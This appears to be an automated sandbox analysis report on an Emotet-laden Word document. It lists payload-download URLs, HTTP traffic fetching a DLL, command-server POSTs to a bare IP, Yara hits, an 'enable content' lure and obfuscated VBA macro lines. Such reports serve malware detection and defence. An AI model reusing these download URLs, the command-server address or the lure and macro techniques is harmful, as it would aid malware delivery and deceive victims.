                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in memory: http://givingthanksdaily.com/qlE/VeF/
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in memory: http://wap.zhonglisc.com/wp-includes/QryCB/
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in memory: https://fnjbq.com/wp-includes/rlR/
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in memory: https://somanap.com/wp-admin/P/
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/octet-streamExpires: Wed, 06 Jan 2021 07:57:52 GMTLast-Modified: Wed, 06 Jan 2021 07:57:52 GMTServer: Microsoft-IIS/10.0Set-Cookie: 5ff56d802ad3f=1609919872; expires=Wed, 06-Jan-2021 07:58:52 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="bLH.dll"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Wed, 06 Jan 2021 07:57:51 GMTContent-Length: 192000Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
                      Source: global trafficHTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1Host: petafilm.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 176.53.69.151 176.53.69.151
                      Source: Joe Sandbox ViewIP Address: 5.2.136.90 5.2.136.90
                      Source: Joe Sandbox ViewASN Name: RADORETR RADORETR
                      Source: Joe Sandbox ViewASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
                      Source: global trafficHTTP traffic detected: POST /6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/ HTTP/1.1DNT: 0Referer: 5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/Content-Type: multipart/form-data; boundary=-------------------g8UsT9LwY8y8blrgAXkUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 6100Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0020023A InternetReadFile,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E1AD59AA-72A2-4470-89E8-B7D87A58E0E0}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1Host: petafilm.comConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: petafilm.com
                      Source: unknownHTTP traffic detected: POST /6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/ HTTP/1.1DNT: 0Referer: 5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/Content-Type: multipart/form-data; boundary=-------------------g8UsT9LwY8y8blrgAXkUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 6100Connection: Keep-AliveCache-Control: no-cache
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: http://givingthanksdaily.com/qlE/VeF/
                      Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2102091328.0000000003A04000.00000004.00000001.sdmpString found in binary or memory: http://petafilm.com
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2103679489.000000001B8B0000.00000004.00000001.sdmpString found in binary or memory: http://petafilm.com/wp-admin/4m/
                      Source: powershell.exe, 00000005.00000002.2097126955.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102087996.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102601330.0000000002870000.00000002.00000001.sdmp, rundll32.exe, 00000011.00000002.2121847060.0000000002790000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: http://wap.zhonglisc.com/wp-includes/QryCB/
                      Source: rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2097126955.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102087996.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102601330.0000000002870000.00000002.00000001.sdmp, rundll32.exe, 00000011.00000002.2121847060.0000000002790000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/cc=
                      Source: powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: https://fnjbq.com/wp-includes/rlR/
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: https://somanap.com/wp-admin/P/

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000012.00000002.2114668618.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099273377.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2105305860.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2103683744.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2113027910.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2116945153.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2101721678.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2117172638.0000000000301000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2103560548.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2101746597.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2109151387.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2114707003.0000000000701000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2100654563.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2110616410.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2112015647.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2106388395.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2119170548.0000000000291000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2351272233.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2109044611.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2106314094.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2100698593.0000000000251000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2110668347.0000000000281000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2351339088.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2107874642.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2112073559.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2108018320.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099440995.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2112967165.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2119062368.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2105231881.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.6e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I I Word
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I I Words:3 I 3 I N@m 13 ;a 1
                      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a
                      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Document contains an embedded VBA macro with suspicious stringsShow sources
                      Source: PACK.docOLE, VBA macro line: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                      Source: PACK.docOLE, VBA macro line: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                      Source: PACK.docOLE, VBA macro line: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                      Source: PACK.docOLE, VBA macro line: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                      Source: PACK.docOLE, VBA macro line: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                      Source: PACK.docOLE, VBA macro line: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                      Source: PACK.docOLE, VBA macro line: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                      Source: PACK.docOLE, VBA macro line: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                      Source: PACK.docOLE, VBA macro line: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                      Source: PACK.docOLE, VBA macro line: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                      Source: PACK.docOLE, VBA macro line: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                      Source: PACK.docOLE, VBA macro line: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                      Source: PACK.docOLE, VBA macro line: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                      Source: PACK.docOLE, VBA macro line: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                      Source: PACK.docOLE, VBA macro line: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                      Source: PACK.docOLE, VBA macro line: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                      Source: PACK.docOLE, VBA macro line: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                      Source: PACK.docOLE, VBA macro line: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
